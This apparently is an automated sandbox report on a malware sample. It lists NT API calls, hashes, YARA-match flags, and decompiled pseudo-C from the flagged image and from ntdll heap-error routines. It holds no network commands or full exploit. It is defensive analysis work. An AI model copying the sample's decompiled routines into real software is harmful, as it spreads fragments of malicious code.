                                                                                  • Instruction Fuzzy Hash: 8FF0E7B2200208ABCB04DF89DC81DEB77A9EF8C714F01865DBE1D97241DA30E8528BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                  				void* _t18;
                                                                                  				void* _t27;
                                                                                  				intOrPtr* _t28;
                                                                                  
                                                                                  				_t13 = _a4;
                                                                                  				_t28 = _a4 + 0xc48;
                                                                                  				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                  				_t6 =  &_a32; // 0x413d52
                                                                                  				_t12 =  &_a8; // 0x413d52
                                                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                  				return _t18;
                                                                                  			}







                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID: R=A$R=A
                                                                                  • API String ID: 2738559852-3742021989
                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                  • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                  • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b37e370795195bb214ac895e95723442484b80a10333391a15f3b15938527eec
                                                                                  • Instruction ID: 2c263b98afa517cbd7694c34359f9bc05476d213677e2aa0ca81aef0d084f610
                                                                                  • Opcode Fuzzy Hash: b37e370795195bb214ac895e95723442484b80a10333391a15f3b15938527eec
                                                                                  • Instruction Fuzzy Hash: 3390027130500813D21161594905717440E97D0381F92D462A1415558D96968952F161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 02f5bef326073fd47ab52026727a1ba1577d5e3decd607e3122f5809c75bfda8
                                                                                  • Instruction ID: df0c2a10b485dc20f83df95165b42bce0ec4762ec500662db2ae81c09684ea22
                                                                                  • Opcode Fuzzy Hash: 02f5bef326073fd47ab52026727a1ba1577d5e3decd607e3122f5809c75bfda8
                                                                                  • Instruction Fuzzy Hash: 39900261346045525645B1594805517840BA7E0381792D062A2405950C85669856F661
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2e9cf1051765da5a4ed1e810f16c3bb3b4f3931d89c73f0cf5d7e2b15f2e2871
                                                                                  • Instruction ID: 5fe78b8e8a5bf13dde6278050a468842fdff0f633731342155bc6200aef82ad3
                                                                                  • Opcode Fuzzy Hash: 2e9cf1051765da5a4ed1e810f16c3bb3b4f3931d89c73f0cf5d7e2b15f2e2871
                                                                                  • Instruction Fuzzy Hash: F79002A130600403420571594815626840F97E0341B52D071E2005590DC5658891B165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4df0d5895471c9d599ffed5220261d21039b58ca4c90351554967e7c609ab24d
                                                                                  • Instruction ID: 62f8001cd35450bbe962e4abe46b9d4661325dbe05aab115f557b996cf548327
                                                                                  • Opcode Fuzzy Hash: 4df0d5895471c9d599ffed5220261d21039b58ca4c90351554967e7c609ab24d
                                                                                  • Instruction Fuzzy Hash: 519002A134500842D20061594815B16440AD7E1341F52D065E2055554D8659CC52B166
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e80d7c203125cfc2431a995e6be34e42da736c2e90a990fe91fa815cae2c4adb
                                                                                  • Instruction ID: ef42eeee6fef04835790744074149e92fff04e6c12f8a526eeca7f5211ea28f8
                                                                                  • Opcode Fuzzy Hash: e80d7c203125cfc2431a995e6be34e42da736c2e90a990fe91fa815cae2c4adb
                                                                                  • Instruction Fuzzy Hash: E7900265315004030205A5590B05517444B97D5391352D071F2006550CD6618861B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: dc067b670126f556ebd329ce32b03f8845794a6dfbf1ddc7b2d9cfb9c0b5d473
                                                                                  • Instruction ID: 0999c95da0bce4362f2acba8bc545f51bbe946d06e9dbf54d540e8d41acefa7d
                                                                                  • Opcode Fuzzy Hash: dc067b670126f556ebd329ce32b03f8845794a6dfbf1ddc7b2d9cfb9c0b5d473
                                                                                  • Instruction Fuzzy Hash: 579002B130500802D24071594805756440A97D0341F52D061A6055554E86998DD5B6A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f9bedaddb025c4e1d92d05970df6e27a5d52e95db099a8ab57550ba0e141cd3b
                                                                                  • Instruction ID: 62dec4ac64d6c71fdcf66a0a64c947fd6626740dbf433f38535b43e1bce99781
                                                                                  • Opcode Fuzzy Hash: f9bedaddb025c4e1d92d05970df6e27a5d52e95db099a8ab57550ba0e141cd3b
                                                                                  • Instruction Fuzzy Hash: 6790027130508C02D2106159880575A440A97D0341F56D461A5415658D86D58891B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 928216486e98d5a809e8bd54a4b9f92d56bbd6476405d995a2cc5b2091897e49
                                                                                  • Instruction ID: 842eeeba38ecddfe2dfa9c1a00305f0785380481860f0cb741bf96040b13f930
                                                                                  • Opcode Fuzzy Hash: 928216486e98d5a809e8bd54a4b9f92d56bbd6476405d995a2cc5b2091897e49
                                                                                  • Instruction Fuzzy Hash: 6290027130500C02D2807159480565A440A97D1341F92D065A1016654DCA558A59B7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b4ec9d7ccc6ca826f5a29d05bb9170989231d19a33c4946eed6c0008f02e4008
                                                                                  • Instruction ID: d2f5c062e4e318d0b09503cad91f87246df6171bb1341a61331479854a6ec08c
                                                                                  • Opcode Fuzzy Hash: b4ec9d7ccc6ca826f5a29d05bb9170989231d19a33c4946eed6c0008f02e4008
                                                                                  • Instruction Fuzzy Hash: E390026131580442D30065694C15B17440A97D0343F52D165A1145554CC9558861B561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7ec1332fde69519660cb26865358955b21695c2fb218c095ffb0e7a9150c97d4
                                                                                  • Instruction ID: 707c0f37a0f316d3163453ad7bfe81c55b34544a9167a6b5fd0f97c011aa08a1
                                                                                  • Opcode Fuzzy Hash: 7ec1332fde69519660cb26865358955b21695c2fb218c095ffb0e7a9150c97d4
                                                                                  • Instruction Fuzzy Hash: 4190026170500442424071698C45916840ABBE1351752D171A1989550D85998865B6A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 65f2be950ea6edb2ad71edb286ba06595b379719aa7902faf72e6ce6eaa798d9
                                                                                  • Instruction ID: 6728a7e5c13068317a48e43076935c8c852b3295ada8bfeb684a0cc180c3ac42
                                                                                  • Opcode Fuzzy Hash: 65f2be950ea6edb2ad71edb286ba06595b379719aa7902faf72e6ce6eaa798d9
                                                                                  • Instruction Fuzzy Hash: 2B90027130540802D20061594C1571B440A97D0342F52D061A2155555D86658851B5B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Strings
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 00F5B352
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00F5B2DC
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00F5B484
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00F5B323
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00F5B38F
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00F5B47D
                                                                                  • The critical section is owned by thread %p., xrefs: 00F5B3B9
                                                                                  • *** enter .exr %p for the exception record, xrefs: 00F5B4F1
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00F5B305
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00F5B314
                                                                                  • The instruction at %p tried to %s , xrefs: 00F5B4B6
                                                                                  • *** then kb to get the faulting stack, xrefs: 00F5B51C
                                                                                  • The resource is owned shared by %d threads, xrefs: 00F5B37E
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00F5B3D6
                                                                                  • write to, xrefs: 00F5B4A6
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00F5B53F
                                                                                  • This failed because of error %Ix., xrefs: 00F5B446
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 00F5B432
                                                                                  • a NULL pointer, xrefs: 00F5B4E0
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00F5B2F3
                                                                                  • read from, xrefs: 00F5B4AD, 00F5B4B2
                                                                                  • *** enter .cxr %p for the context, xrefs: 00F5B50D
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 00F5B48F
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 00F5B3C5
                                                                                  • <unknown>, xrefs: 00F5B27E, 00F5B2D1, 00F5B350, 00F5B399, 00F5B417, 00F5B48E
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 00F5B374
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00F5B39B
                                                                                  • an invalid address, %p, xrefs: 00F5B4CF
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00F5B476
                                                                                  • *** Inpage error in %ws:%s, xrefs: 00F5B418
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E00F61C06() {
                                                                                  				signed int _t27;
                                                                                  				char* _t104;
                                                                                  				char* _t105;
                                                                                  				intOrPtr _t113;
                                                                                  				intOrPtr _t115;
                                                                                  				intOrPtr _t117;
                                                                                  				intOrPtr _t119;
                                                                                  				intOrPtr _t120;
                                                                                  
                                                                                  				_t105 = 0xe848a4;
                                                                                  				_t104 = "HEAP: ";
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				_push( *0xf9589c);
                                                                                  				E00EAB150("Heap error detected at %p (heap handle %p)\n",  *0xf958a0);
                                                                                  				_t27 =  *0xf95898; // 0x0
                                                                                  				if(_t27 <= 0xf) {
                                                                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M00F61E96))) {
                                                                                  						case 0:
                                                                                  							_t105 = "heap_failure_internal";
                                                                                  							goto L21;
                                                                                  						case 1:
                                                                                  							goto L21;
                                                                                  						case 2:
                                                                                  							goto L21;
                                                                                  						case 3:
                                                                                  							goto L21;
                                                                                  						case 4:
                                                                                  							goto L21;
                                                                                  						case 5:
                                                                                  							goto L21;
                                                                                  						case 6:
                                                                                  							goto L21;
                                                                                  						case 7:
                                                                                  							goto L21;
                                                                                  						case 8:
                                                                                  							goto L21;
                                                                                  						case 9:
                                                                                  							goto L21;
                                                                                  						case 0xa:
                                                                                  							goto L21;
                                                                                  						case 0xb:
                                                                                  							goto L21;
                                                                                  						case 0xc:
                                                                                  							goto L21;
                                                                                  						case 0xd:
                                                                                  							goto L21;
                                                                                  						case 0xe:
                                                                                  							goto L21;
                                                                                  						case 0xf:
                                                                                  							goto L21;
                                                                                  					}
                                                                                  				}
                                                                                  				L21:
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				_push(_t105);
                                                                                  				E00EAB150("Error code: %d - %s\n",  *0xf95898);
                                                                                  				_t113 =  *0xf958a4; // 0x0
                                                                                  				if(_t113 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter1: %p\n",  *0xf958a4);
                                                                                  				}
                                                                                  				_t115 =  *0xf958a8; // 0x0
                                                                                  				if(_t115 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter2: %p\n",  *0xf958a8);
                                                                                  				}
                                                                                  				_t117 =  *0xf958ac; // 0x0
                                                                                  				if(_t117 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter3: %p\n",  *0xf958ac);
                                                                                  				}
                                                                                  				_t119 =  *0xf958b0; // 0x0
                                                                                  				if(_t119 != 0) {
                                                                                  					L41:
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					_push( *0xf958b4);
                                                                                  					E00EAB150("Last known valid blocks: before - %p, after - %p\n",  *0xf958b0);
                                                                                  				} else {
                                                                                  					_t120 =  *0xf958b4; // 0x0
                                                                                  					if(_t120 != 0) {
                                                                                  						goto L41;
                                                                                  					}
                                                                                  				}
